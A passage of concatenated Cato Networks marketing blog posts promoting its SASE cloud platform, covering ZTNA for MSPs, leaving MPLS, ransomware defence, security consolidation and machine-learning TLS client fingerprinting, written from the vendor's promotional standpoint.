raised over $500 million in venture capital resulting in a private $2.5 billion valuation. 5. For the traditional managed services powerhouses like AT&T and Verizon, do they have all the SASE capabilities, where did they get them, and how well are they integrated? What is the process for troubleshooting, SLAs, and support? Is there a single management dashboard? Cato just like any cloud service provider enables organizations to co-manage their own Cato implementation while Cato maintains the underlying infrastructure. IT teams can opt to manage infrastructure themselves, outsource a subset of responsibilities to a Cato partner, or have a Cato partner fully manage the infrastructure. There's always 24x7 support available. 6. Is there flexibility in terms of policy enforcement? In other words, can a consistent SASE security policy be applied across the entire global enterprise, and can that policy also be enforced locally depending on business policy and compliance requirements? Yes, customers apply a consistent security policy across the enterprise. In fact, enterprises have full control over their security policies. We instantiate the most commonly used security policies at startup, so most customers require little or no changes. The policy set is instantly applied across the global enterprise or to a specific site or user depending on requirements. Enterprises can, of course, add/change policies as necessary. 7. Even if enforcement nodes are localized, is there a SASE management control plane that enables centralized administration? This administrative interface should allow security and network policy to be managed from a single console and applied regardless of the location of the user, the application, or the data. Cato provides centralized administration via our management application. Both security and network policies are managed from the same interface for all Cato-connected users and resources, whether they exist in the office, on the road, at home, or in the cloud. 8. How is sensitive data handled? What are the capabilities in terms of visibility, control and extra protection? Cato encrypts and protects all data in transit and at rest within the Cato network. Designated applications or data flows that contain sensitive information can also remain encrypted if required in a way that bypasses Cato inspection engines. 9. Is policy enforced consistently across all types of remote access to enterprise resources, whether those resources live in the public internet, in a SaaS application, or in an enterprise app that lives on-premises or in an IaaS setting? Part of what makes Cato unique is that all inspection engines and network capabilities operate on both northbound traffic to the Internet or east-west traffic to other Cato-connected resources. Our CASB, for example, inspects all Internet and cloud-based traffic. Security capabilities continue to perform well on East-West traffic regardless of the user's location due to the Cato global private backbone and our distributed cloud architecture. 10. Is policy enforced consistently for all possible access scenarios--individual end users accessing resources from a home office or a remote location, groups of users at a branch office, as well as edge devices, both managed and unmanaged? Cato uses a single policy set for all access scenarios. 11. Is the network able to conduct single-pass inspection of encrypted traffic at line rate? Since the promise of SASE is that it combines multiple security and policy enforcement processes, including special treatment of sensitive data, all of that traffic inspection has to be conducted at line speed in a single pass in order to provide the user experience that customers demand. Cato uses a single-pass inspection engine that can operate at line rate even on encrypted traffic. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the full set of networking and security capabilities to any user or application, anywhere in the world at cloud scale using a service that is both self-healing and self-maintaining. 12. Is the SASE service scalable, elastic, resilient, and available across multiple PoPs? Be sure to pin the service provider down on contractually enforced SLAs. The Cato SASE Cloud is a fully distributed, self-healing service, that includes many tiers of redundancies. If the core processing a flow fails, the flow will be handled by one of the other cores in the compute node. Should a compute node fail, other compute nodes in the Cato PoP assume the operation. Should the PoP become inaccessible, Cato has 70+ other PoPs available that enable users to automatically reconnect to the next best available PoP. Enterprises do not need to do any high availability (HA) planning that is typically required when relying on virtual appliances to deliver SASE services. We have 99.999% uptime SLAs with our carriers. Should one of the tier-1 carriers connecting our PoPs experience an outage or slowdown, Cato's routing software detects the change and automatically selects the next best path from one of two other carriers connecting our PoPs. Should the entire Cato backbone -- that's right all 70+ PoPs somehow disappear, one day -- Cato Sockets will automatically bring up a peer-to-peer network. 13. One of the key concepts of zero trust is that end-user behavior should be monitored throughout the session and actions taken to limit or deny access if the end user engages in behavior that violates policy. Can the SASE enforce those types of actions in real time? Cato inspects device posture first upon connecting to the network, ensuring the device meets predefined policy requirements and then continues to monitor the device once connected. Should a key variable change, such as an anti-malware engine expire, the device can be blocked from the network or provided limited access depending on corporate requirements. As users connect to cloud application resources, Cato inspects traffic flows. Dozens of actions within applications can be blocked, enabled, or otherwise monitored and reported, such as uploading files or giving write access to key applications. 14. Will the SASE deliver a transparent and simplified end user experience that is the same regardless of location, device, OS, browser, etc.? The Cato experience remains consistent regardless of operating system. Mobile users can be given clientless access or client-based access with the Cato Mobile Client. The Cato Mobile Client is available for all major enterprise platforms including Windows, macOS, Android (also supported for ChromeOS), iOS, and Linux. Users within the locations connected by Cato Sockets, Cato's edge SD-WAN device, log into their network as usual with no change. Once connected to the Cato SASE Cloud, all security inspection is done locally at the connected PoP, eliminating the traffic backhaul that so often degrades the performance of mobile users situated far from their offices. The Cato Global Private Backbone uses optimized routing to minimize latency and WAN optimization to maximize throughput. The result is a remote user experience that's as close as possible to being inside the office. Other Questions to Explore We applaud Network World for raising these issues. Some other questions we might encourage IT teams to ask MSPs include: High Availability (HA): Take a close look at how HA is delivered by the vendor. What's the additional cost involved with deploying the secondary appliance? How are the SD-WAN devices configured and deployed? With most enteprises, HA has become the defacto edge configuration to ensure the high uptime they're looking for particularly when replacing MPLS. What happens when there is a lockup rather than just an outage, will the system failover properly? What about the underlying memory, storage, and server system underpinning what are often virtual appliances? What happens if the PoP itself becomes inaccessible? The list goes on. The secure Cato SASE platform is based on a fully distributed self-healing network built for the cloud era that we manage 24/7 on behalf of our customers. Anything less than that from our perspective simply isn't SASE.

Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers

The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and has become an incentive and negotiating point for many prospective hires. However, many organizations are still reliant on legacy remote access solutions, such as virtual private networks (VPNs), that are...
Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and has become an incentive and negotiating point for many prospective hires. However, many organizations are still reliant on legacy remote access solutions, such as virtual private networks (VPNs), that are not designed for the modern, distributed enterprise. Upgrading to zero trust network access (ZTNA) provides numerous benefits to these organizations. Main Benefits of ZTNA for MSPs For Managed Service Providers (MSPs) offering remote access services, making the move to ZTNA can significantly help their customers. However, it is not just the customer who benefits. An MSP that makes ZTNA part of its service offering can reap significant benefits, especially if it is deployed as part of a Secure Access Service Edge (SASE) offering. Let’s take a closer look at some of the key benefits: Tighter Security Controls VPNs are designed solely to provide a secure network link between two points. VPNs have no built-in traffic inspection capabilities and provide users with unrestricted access to corporate resources. By using VPNs for secure remote access, organizations expose themselves to various cyber threats. Cyber threat actors commonly target VPNs with credential stuffing attacks, hoping to take advantage of compromised credentials to gain full access to the enterprise network. VPNs are also prone to vulnerabilities that attackers can exploit to bypass access controls or eavesdrop on network traffic. ZTNA provides the same remote access capabilities as VPNs but does so on a case-by-case basis that allows effective implementation of least privilege access controls. By deploying ZTNA to customer environments, MSPs can reduce the occurrence and impact of security incidents. This results in an improved customer experience and reduced costs of recovery. [boxlink link="https://www.catonetworks.com/resources/poor-vpn-scalability-hurts-productivity-and-security/?utm_source=blog&utm_medium=top_cta&utm_campaign=poor_vpn_scalability"] Poor VPN Scalability Hurts Productivity and Security | EBOOK [/boxlink] Improved Visibility and Control VPNs provide unrestricted access to the corporate network, providing a user experience similar to working from the office. Since VPNs don’t care about the eventual destination of network traffic, they don’t collect this information. This provides an organization or their MSP with limited visibility into how a VPN is being used. ZTNA provides access to corporate resources on a case-by-case basis. These access decisions are made based on the account requesting the access, the resource requested, and the level of access requested. Based on this data and an organization’s access controls, access is permitted or denied. ZTNA performs more in-depth traffic inspection and access management as part of its job, and these audit logs can provide invaluable visibility to an MSP. With the ability to see which accounts are remotely accessing various resources, an MSP can more easily investigate potential security incidents, identify configuration errors and other issues, and strategically allocate resources based on actual usage of IT infrastructure and assets. Improved Customer Satisfaction During the pandemic, the performance and scalability limitations were laid bare for all to see. Many organizations needed to rapidly shift from mostly on-site to remote work within a matter of weeks. To do so, they often deployed or expanded VPN infrastructure to support a workforce much larger than existing solutions were designed to handle. However, VPNs scale poorly and can create significant performance issues. Remote access deployments built on VPNs overwhelmed existing network infrastructure, created significant latency, and offered poor support for the mobile devices that remote workers are increasingly using to do their jobs. During the pandemic, employees experienced significant network latency as traffic to cloud-based applications and data storage was backhauled through on-prem data centers by VPN appliances. As a result, employees commonly sought workarounds - such as downloading sensitive data to devices for easier access or using unapproved services - in order to do their jobs. ZTNA solutions provide optimized performance and better security by moving away from the perimeter-focused security model of VPNs. As corporate infrastructure and resources move to the cloud, employees need high-performance access to SaaS solutions, and routing traffic to these solutions via the corporate network makes no sense. ZTNA makes it possible to perform access management in the cloud and improve the user experience. For MSPs, improving the end user experience also improves the experience of their customers, who need to listen to employees’ complaints about performance and latency issues. Additionally, ZTNA enables an MSP to eliminate inefficient routing, which creates unnecessary load on their infrastructure and can make it more difficult to meet customer expectations for network performance. Value-Added Functionality VPNs provide bare-bones network connectivity for remote users. If an organization wants additional access control or to secure the traffic flowing over the VPN connection, this requires additional standalone solutions. By making the move from VPNs to ZTNA for secure remote access, an MSP can expand the services offered to their customers with minimal additional overhead. ZTNA offers access management, and so can an MSP. The data generated by ZTNA can be processed and displayed on dashboards for customers looking for additional insight into their network usage or security. MSPs can provide ongoing support services for the management and maintenance of ZTNA solutions. SASE Supercharges ZTNA Making the move to ZTNA for their secure remote access offerings makes logical sense for MSPs. ZTNA provides more functionality, better performance and security, and simpler management and maintenance than VPN-based infrastructure. However, the benefits of ZTNA can be dramatically expanded by deploying it as part of a SASE solution. SASE is deployed as a network of cloud-based points of presence (PoPs) with dedicated, high-performance network links between them. Each SASE PoP integrates ZTNA with other security and network optimization features, providing high-performance and reliable connectivity and enterprise-grade security for the corporate WAN. Making the move to ZTNA streamlines and optimizes an MSP’s remote access services offering. Deploying it with SASE does the same for an MSP’s entire network and security services portfolio.

IT Managers: Read This Before Leaving Your MPLS Provider

Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs by your CFO. “That MPLS – too expensive. Find an alternative.” This couldn’t have come at a better time… Employees have been blowing up the helpdesk, complaining about slow internet,...
IT Managers: Read This Before Leaving Your MPLS Provider Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs by your CFO. “That MPLS – too expensive. Find an alternative.” This couldn’t have come at a better time... Employees have been blowing up the helpdesk, complaining about slow internet, laggy Zoom calls and demos that disconnect with prospects. Naturally, it’s your job to find a solution... There actually could be several reasons why it’s time to pull the plug on your MPLS, or at least, consider MPLS alternatives. 1. Get crystal clear on your WAN challenges: Do any of these challenges sound familiar? A. You’ve been told to cut costs It’s no secret that MPLS circuits cost a fortune – often 3-4x the price of MPLS alternatives (like SD-WAN,) for only a fraction of the bandwidth. But the bottom line isn’t the only factor to take into consideration. Lengthy lead-times for site installations (weeks to months,) upgrades, and never-ending rounds of support tickets must all factor into the TCO of your MPLS. In short, MPLS is no longer competitively priced for today’s enterprise that needs to move at the speed of business. B. Employees constantly complain about performance While traditional hub-and-spoke networking topology comes with its advantages, when users backhaul to the data center they clog the network with bandwidth-heavy applications like VOIP and file transfer. Multiplied by hundreds or thousands of simultaneous users and you choke your network, creating performance problems which IT is tasked to solve. Wouldn’t it be nice if IT was free to solve business-critical issues instead of recurring network performance issues? [boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=wont_tell_you_about_mpls"] What Others Won’t Tell You About MPLS | EBOOK [/boxlink] C. You’re “going cloud” and migrating from on-prem to cloud DCs and apps Migrating from on-prem legacy applications to cloud isn’t generally an “if” but a “when” statement. And the traditional hub-and-spoke networking architecture creates too much latency on cloud applications when the goal is ultimately improved network performance. Additionally, optimizing and securing branch-to-cloud and user-to-cloud access can’t be done efficiently with physical infrastructure, instead of requiring advanced cloud-delivered cybersecurity solutions like SWG, FWaaS and CASB. D. IT now needs to support work from anywhere, with no downtime Prior to COVID, work from anywhere was more the exception, rather than a rule. In the “new normal,” enterprises need to the infrastructure to support work from the branch, home, and everywhere else. Traditional remote-access VPNs weren’t designed to support hundreds, or thousands of users simultaneously connecting to the network, while supporting an optimum security posture, like ZTNA can. So, should you stay with MPLS or should you go? Ultimately, it’s time to decide whether to stick with your incumbent MPLS provider or consider the alternatives to MPLS... Whether it’s cost, digitization, performance or secure remote access - is your MPLS “good enough” to support today’s hassles and headaches (not to mention tomorrows?) 2. You’ve decided to look for MPLS alternatives: Do all roads lead to SD-WAN? You’ve decided that your MPLS isn’t all it's cracked up to be. Now what? While an SD-WAN solution seems like the natural choice, SD-WAN only addresses some of the challenges that you’ll inevitably face at a growing enterprise. True, SD-WAN will lower the bill and optimize spend by leveraging internet circuits’ massive capacity and availability everywhere. However, SD-WAN was designed to optimize performance for site-to-site connectivity, with architecture that isn’t designed to support remote users and clouds. Additionally, SD-WAN's security is basic at best, lacking the advanced control and prevention capabilities that enterprises need to secure all clouds, datacenters, branches, users and, appliances. Not to mention, adding SD-WAN to existing appliance sprawl is only going to further complicate your network management, adding more products to administrate, and more hassle surrounding appliance sizing, scaling, distribution, patching and upkeep. And who needs that headache? So, how do you solve all the above four challenges, while upgrading your networks and achieving an optimal security posture that allows your enterprise to grow, scale, adjust and stay prepared for “whatever’s next”? 3. Ever Heard of SASE? No, SASE isn’t just a buzzword or industry hype. It’s the next era of networking and security architecture which doesn’t focus on adding more features to the complicated pile of point solutions, but targets “operational simplicity, automation, reliability and flexible business models,” (Gartner, Strategic roadmap for networking, 2019.) According to Gartner, for a solution to be SASE, it must “converge a number of disparate network and network security services including SD-WAN, secure web gateway, CASB, SDP, DNS protection and FWaaS,” (Gartner, Hype Cycle for Enterprise Networking 2019.) Gartner is extremely clear that these requirements aren’t just “nice-to-have,” but non-negotiables; the solution must be converged, cloud-native, global, support all edges, and offer unified management. SASE actually combines SD-WAN and security-as-a-service, managed via a single cloud service, which is globally distributed, automatically scaled, and always updated. So, instead of opting for more network complexity with SD-WAN, plus all the setup, management, sizing, and scaling challenges that come with it – why not consider SASE? It’s time to think strategically: Move beyond the limitations of SD-WAN No matter if you need to solve one, two, three or all four of the above WAN challenges, SD-WAN is a short-sighted point solution to any long-term organizational challenge. This means that only a SASE solution with an integrated SD-WAN which includes a global-private backbone (over costly long-haul MPLS,) ZTNA (to serve remote access users and replace legacy VPN) and secure cloud access (which allows you to migrate to the cloud,) allows you to successfully grow the business while maintaining your sanity. If you’re interested in replacing your MPLS beyond the limits of short-sighted solutions like SD-WAN, then you’ll love Cato SASE Cloud. Check out this Cato SASE E-book to understand: Why point products like SD-WAN won’t solve long-term architectural problems What you need to look for in a SASE solution Why Cato is the only true SASE solution in enterprise networking and security

How to Protect from Ransomware with SASE

With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of...
How to Protect from Ransomware with SASE With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of impact of ransomware on organizations, and how Cato SASE Cloud can help prevent ransomware and protect businesses. This blog post is based on the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”. 4 Ways Ransomware Affects Organizations 1. Immediate Loss of Productivity Organizations depend almost entirely on data and applications for their daily operations, including making payments, creating products and delivering and shipping them. If this comes to a halt, the loss of productivity is enormous. For some global enterprises, this could even mean losing millions of dollars per hour. Recovering backups and attempting data recovery could take IT teams weeks of work. To restore productivity, some businesses prefer to pay the ransom and get operations back on track. 2. Data Encryption According to Cybercrime Magazine, the global cost of ransomware damages will exceed $20 billion in 2021 and $265 Billion by 2031. One of the ways attackers gain these amounts is encrypting organizational data, and requiring a payment for instructions on how to decrypt it. To motivate victims to pay, attackers might threaten to destroy the private key after a certain amount of time, or increase the price as time passes. To view the entire list and additional ways ransomware impacts organizations, check out the ebook. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help/?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | eBook [/boxlink] How Cato SASE Cloud Prevents Ransomware By converging network and security into a global, cloud-native service, Cato’s SASE platform provides visibility into traffic, edges and resources, which enables building a comprehensive and unique security solution that protects from malware while eliminating false positives. Here’s are six ways Cato SASE Cloud protected organizations from ransomware: 1. Reputation Data & Threat Intelligence Cato leverages threat intelligence feeds from open-source, shared communities and commercial providers. In addition, after finding that 30% of feeds contain false positives or miss IoCs, Cato built a complementing system that uses ML and AI to aggregate records and score them. 2. Blocking Command and Control Communication Cato IPS prevents delivery of ransomware to machines, which is the primary way perpetrators gain hold of systems prior to the attack. If an attacker is already inside the network, Cato prevents the communication that attackers use to encrypt files and data. 3. Blocking Suspicious SMB File Activity Cato IPS detects and blocks irregular network activity, which could be the result of attackers using SMB to rename or change extensions of encrypted files. 4. Zero Trust Network Access Cato SASE Cloud provides a zero-trust approach to ensure users and hosts can only access applications and resources they are authorized for. This reduces the attack surface, limiting ransomware's ability to spread, encrypt and exfiltrate data. 5. Stopping Known and Zero-Day Threats Leveraging machine learning, Cato’s advanced anti-malware solution defends against unknown threats and zero-day attacks, and is particularly useful against polymorphic malware designed to evade signature-based inspection engines. 6. An IPS that Sees the Full Picture, Not a Partial One Cato’s IPS has unique capabilities across multiple security layers, including: layer-7 application awareness, user identity awareness, user/agent client fingerprint, true file type, target domain/IP reputation, traffic attributes, behavioral signature and heuristic, and more. Scale Your Security Team with Cato MDR Cato can offload the resource-intensive process of detecting compromised endpoints from organizations’ already-busy IT and security teams. This eliminates the need for additional installations as Cato already serves as the customer’s SASE platform, supplying unparalleled visibility into all traffic from all devices. Capabilities provided: Automated Threat Hunting Human Verification Network-Level Threat Containment Guided Remediation Reporting & Tracking Assessment Check-Ups Cato MDR service can help you identify and contain ransomware and suspicious activities before they activate and impact your business. Through lateral movement detection and baselining host behavior, Cato MDR service gives your network an extra set of eyes to detect, isolate and remediate threats. Contact us to learn more. See the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.    

Lipstick on a Pig: When a Single-Pane-of-Glass Hides a Bad SASE Architecture

The Secure Access Service Edge (SASE) is a unique innovation. It doesn’t focus on new cutting-edge features such as addressing emerging threats or improving application performance. Rather, it focuses on making networking and security infrastructure easier to deploy, maintain, manage, and adapt to changing business and technical requirements. This new paradigm is threatening legacy point...
Lipstick on a Pig: When a Single-Pane-of-Glass Hides a Bad SASE Architecture The Secure Access Service Edge (SASE) is a unique innovation. It doesn’t focus on new cutting-edge features such as addressing emerging threats or improving application performance. Rather, it focuses on making networking and security infrastructure easier to deploy, maintain, manage, and adapt to changing business and technical requirements. This new paradigm is threatening legacy point solution incumbents. It portrays the world they created for their customers as costly and complex, pressuring customer budgets, skills, and people. Gartner tackled this market trend in their research note: “Predicts 2022: Consolidated Security Platforms are the Future.” Writes Gartner, “The requirement to address changing needs and new attacks prompts SRM (security and risk management) leaders to introduce new tools, leaving enterprises with a complex, fragmented environment with many stand-alone products and high operational costs.” In fact, customers want to break the trend of increasing operational complexity. Writes Gartner. “SRM leaders tell Gartner that they want to increase their efficiency by consolidating point products into broader, integrated security platforms that operate as a service”. This is the fundamental promise of SASE. However, SASE is extremely difficult for vendors that start from a pile of point solutions built for on-premises deployment. What such vendors need to do is re-architect these point solutions into a single, converged platform delivered as a cloud service. What they can afford to do is to hide the pile behind a single pane of glass. Writes Gartner: “Simply consolidating existing approaches cannot address the challenges at hand. Convergence of security systems must produce efficiencies that are greater than the sum of their individual components." [boxlink link="https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider"] 5 Questions to Ask Your SASE Provider | eBook [/boxlink] How can you achieve efficiency that is greater than the sum of the SASE parts? The answer is: core capabilities should be built once and be leveraged to address multiple functional requirements. For example, traffic processing. Traffic processing engines are at the core of many networking and security products including routers, SD-WAN devices, next generation firewalls, secure web gateways, IPS, CASB/DLP, and ZTNA products. Each such engine uses a separate rule engine, policies, and context attributes to achieve its desired outcomes. Their deployment varies based on the subset of traffic they need to inspect and the source of that traffic including endpoints, locations, networks, and applications. A true SASE architecture is “single pass.” It means that the same traffic processing engine can address multiple technical and business requirements (threat prevention, data protection, network acceleration). To do that, it must be able to extract the relevant context needed to enforce the applicable policies across all these domains. It needs a rule engine that is expandable to create rich rulesets that use context attributes to express elaborate business policies. And it needs to feed a common repository of analytics and events that is accessible via a single management console. Simply put, the underlying architecture drives the benefits of SASE bottom-up -- not a pretty UI managing a convoluted architecture top-down. If you have an aggregation of separate point products everything becomes more complex -- deployment, maintenance, integration, resiliency, and scaling -- because each product brings its unique set of requirements, processes, and skills to an already very busy IT organization. This is why Cato is the world’s first and most mature SASE platform. It isn’t just because we cover the key functional requirements of SD-WAN, Secure Web Gateway (SWG), Firewall-as-a-Service (FWaaS), Cloud Access Security Broker (CASB), and Zero Trust Network Access (ZTNA). Rather, it is because we built the only true SASE architecture to deliver these capabilities as a single global cloud service with simplicity, automation, scalability, and resiliency that truly enables IT to support the business with whatever comes next.    

The Value of Security Simplicity

A Complex Landscape As time passes, technology and human innovation have advanced rapidly. This is not only in terms of available connectivity, bandwidth, and processing power but also in terms of the networking and security landscape as well. For every technological advancement in consumer and business productivity, IT systems, operations and security must also try...
The Value of Security Simplicity A Complex Landscape As time passes, technology and human innovation have advanced rapidly. This is not only in terms of available connectivity, bandwidth, and processing power but also in terms of the networking and security landscape as well. For every technological advancement in consumer and business productivity, IT systems, operations and security must also try and keep pace. We must consider not only the speed and capacity at which these tools must operate, but also the emergence of entirely new technical domains. The industry has moved away from castle and moat designs and replaced them with cloud platforms for a variety of services, effectively moving from endpoint security to network security and finally to cloud security and cloud-delivered network security. But with each new need and technical area, a multitude of vendors and products emerge only adding to the complexity.   [caption id="attachment_24677" align="alignnone" width="3000"] Momentum CyberScape Source[/caption]   IT and security leaders must consider multiple security product categories such as network & infrastructure, web, endpoint, application, data, mobile, risk & compliance, operations & incident response, threat intelligence, IoT, IAM, email/messaging, risk management, and more. Adding to the challenge, for each category there are multiple vendors with different product sets, architectures and capabilities. It can be time consuming and challenging to prioritize security investments while selecting the ideal vendor for your business. While each product that you purchase and implement is intended to strengthen your security posture and reduce risk, these products may also be increasing the complexity of your environment. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | Get the eBook [/boxlink] Complexity Erodes Security Many have considered it a best practice to purchase products based on the perception in the market as “best of breed.” This approach seems logical but can be detrimental as getting these products to work together can be difficult or impossible. Even products from the same vendor can be lacking in integration, especially if the product was the result of an acquisition. Furthermore, even with out-of-the-box integrations, getting everything to work as desired can still be very time-consuming. You may have already learned through experience that integration is not convergence. If you are still questioning the difference between the two, here are two examples. A converged solution will have a single management application for all functions of the platform. Separate consoles or a pseudo-unified console that requires downloading, installing, and managing plugins are not converged. For cloud-delivered offerings, a converged solution will offer all capabilities at all PoPs. A vendor that uses some PoPs for capabilities like DLP and remote access and other PoPs for things like NGFW and SWG is not converged. Non-converged solutions can drastically increase management touch, increasing administrative overhead and cost while eroding security value. How does this happen? For every new product and management application, the opportunity for misconfiguration increases as does the number of policies. Misconfigurations can easily lead to high profile security incidents, while multiple sets of separate policies can lead to gaps that are difficult to identify. A converged security platform provides holistic visibility into your organization’s policies and even makes it easier when you need to conduct compliance audits. Of course, the market has responded to this, and you can spend more money on third-party integration and management tools, or developers that can build custom integrations for you. However, CISO’s live in the real world and do not have unlimited budget, nor do they typically want to own a software development life cycle for home-built integrations. Just remember, more vendors and more products can easily mean more problems. Is Your Security Stack Weighing You Down? In addition to hurting your organization’s budget and security posture, point-security products also reduce your ability to be agile and innovate. You may need to manage an update schedule for each of your devices and products. While most vendors have automatic update options, the best practice is to test updates before putting them into production and monitor impacts after production. For example, a content update on a Palo Alto Networks PA-220 Firewall is estimated to take up to 10 minutes.* If you have 1,000 PA-220s, that is more than 166 hours of update time, not including downloading, testing, and verifying. Updates to the device’s firmware or operating system will likely take longer and can lead to outages or device failures. All this time spent on maintaining what you already own can slow other projects in your organization. “[Content update] installation can take up to 10 minutes on a PA-220 firewall” * Source Beyond your organization’s ability to innovate, you should also consider the impacts on yourself or your team. Most security products require specialized technical expertise. This can make hiring challenging, especially if you need someone who can manage multiple aspects of your deployment. This means that hiring cycles will take longer, work/life balance may be compromised, and new hire ramping time is increased. Furthermore, complex deployments can make it difficult for skilled individuals to be promoted or take vacation time. Your security stack represents a significant investment, but is it serving all users, locations, and applications? The costs of deploying and managing your own security architecture will often lead to compromises. You may have a few datacenters and probably backhaul traffic to them to secure. But often enough due to performance and other requirements, you may also be excluding specific locations, users, or applications from some or all security functions. This creates inconsistency in your security posture and user experience and will hurt your organization. SASE Is the Way You probably have heard of the Secure Access Service Edge or SASE, a term that Gartner coined in 2019. SASE is the way forward for most modern organizations and represents the convergence of networking and security capabilities delivered from the cloud. This allows organizations to remain agile and flexible, reducing complexity, while securing and enabling their users. The SASE market is relatively new, but there are already multiple vendors who want your business. When looking at SASE, don’t forget about simplicity, many vendors don’t have converged solutions and the complexity of legacy technology still lurks in their products. Management time and policy sets should be reduced, while deployments and new feature adoption should be seamless. Updates are the vendor's responsibility, keeping you more secure and giving you time for other projects. You may have heard the acronym K.I.S.S. before, but I’ve changed it a bit for a SASE world: Keep It Simple & Secure. “When we learned about the Cato solution, we liked the idea of simple and centralized management. We wouldn’t have to worry about the time-consuming process of patch management of on-premise firewalls,” – Alf Dela Cruz, Head of IT Infrastructure and Cyber Security at Standard Insurance    

Inside Cato: How a Data Driven Approach Improves Client Identification in Enterprise Networks

Identification of OS-level client types over IP networks has become crucial for network security vendors. With this information, security administrators can gain greater visibility into their networks, differentiate between legitimate human activity and suspicious bot activity, and identify potentially unwanted software. The process of identifying clients by their network traces is, however, very challenging. Most...
Inside Cato: How a Data Driven Approach Improves Client Identification in Enterprise Networks Identification of OS-level client types over IP networks has become crucial for network security vendors. With this information, security administrators can gain greater visibility into their networks, differentiate between legitimate human activity and suspicious bot activity, and identify potentially unwanted software. The process of identifying clients by their network traces is, however, very challenging. Most of the common methods being applied today require a great deal of manual work, advanced domain expertise, and are prone to misclassification. Using a data-driven approach based on machine learning, Cato recently developed a new technology that addresses these problems, enabling accurate and scalable identification of network clients. Going “old school” with manual fingerprinting One of the most common methods to passively identify network clients, without requiring access to either endpoint, is fingerprinting. Imagine you are a police investigator arriving at a crime scene for forensics. Lucky for you, the suspect left an intact fingerprint. Since he is a well-known criminal with previous offenses, his fingerprints are already in the police database, and you can use the one you found to trace back to him. Like humans, network clients also leave unique traces that can be used to identify them. In your network, combinations of attributes such as HTTP headers order, user-agents, and TLS cipher suites, are unique to certain clients. [boxlink link="https://catonetworks.easywebinar.live/registration-ransomware-chokepoints"] Ransomware Chokepoints: Disrupt the Attack | Watch Webinar [/boxlink] In recent years, fingerprints relying solely on unsecured network traffic attributes (e.g., the HTTP user-agent value) have become obsolete, since they are easy to spoof, and are not applicable when using secured connections. TLS fingerprints, that rely on attributes from the Client Hello message of the TLS handshake, on the other hand, do not suffer from these drawbacks and are slowly gaining larger adaptation from security vendors. Below is an example of a TLS fingerprint that identifies a OneDrive client. Caption: TLS header fingerprint of a One Drive client (source) However, manually mapping network clients to unique identifiers is not a simple task; It requires in-depth domain knowledge and expertise. Without them, the method is prone to misclassifications. In a shared community effort to address this issue, some open-source projects (e.g. sslhaf and JA3) were created, but they provide low coverage and are not updated frequently. An even greater issue with manual fingerprinting is scalability. Accurately classifying client types requires manually analyzing traffic captures, a labor-intensive process that does not scale for enterprise networks. Taking such an approach at Cato wasn’t feasible. Each day the Cato SASE Cloud must inspect millions of unique TLS handshake values. The large number of values is due not only to the number of network clients connected to Cato SASE Cloud but also to the number of different versioning and updates that alter the TLS behavior of each client. Clearly, we needed a better solution. Clustering – An automated and robust approach With great amounts of data, comes great amounts of capabilities. With the use of machine learning clustering algorithms, we’ve managed to reduce millions of unique TLS handshake values to a subset of a few hundred clusters, representing unique network clients that share similar values. After creating the clusters, a single fingerprint can be generated for each one, using the longest common substring (LCS) from the Client Hello message of all the samples in the cluster. Finding the common denominator of several samples makes the approach more robust to small variations in the message values. Caption: Similar values from the TLS Client Hello message are clustered together and the LCS is used to generate a fingerprint. Each colored cluster represents a different client. The next step of the process is to identify and label the client of the fingerprint. To do so, we search for the fingerprint in our data lake, containing terabytes of daily network flows generated from different clients, and look for common attributes such as domains or applications contacted, and HTTP user-agent (visible from TLS traffic interception and inspection). For example, in the plot above, a group of TLS network flows, containing similar Client Hello messages, were clustered together by the algorithm (see the 3-point “Java/1.8.0_211” cluster colored in light blue). The resulting TLS fingerprint matched a group of inspected TLS flows in our data lake, with visible HTTP headers; all of which had a common user-agent that belongs to the Java Standard Library; a library used to perform HTTP requests. Wrapping up Accurately identifying client types has become crucial for network security vendors. With this new data-driven approach, we’ve managed to develop a fully automated and continuous pipeline that generates TLS fingerprints. The new method scales to large enterprise networks and is more robust to variation in the client's network activity.    

Can You Really Trust Zero Trust Network Access?

Why Yes The global economy’s shift to hybrid work models is challenging enterprises to securely connect their work-from-anywhere employees. Supporting these highly distributed, dynamic, and diverse networks requires enterprises to be more flexible and accommodating, which results in remote access becoming an increasingly expanding attack surface. A crucial step in reducing this risk is transitioning...
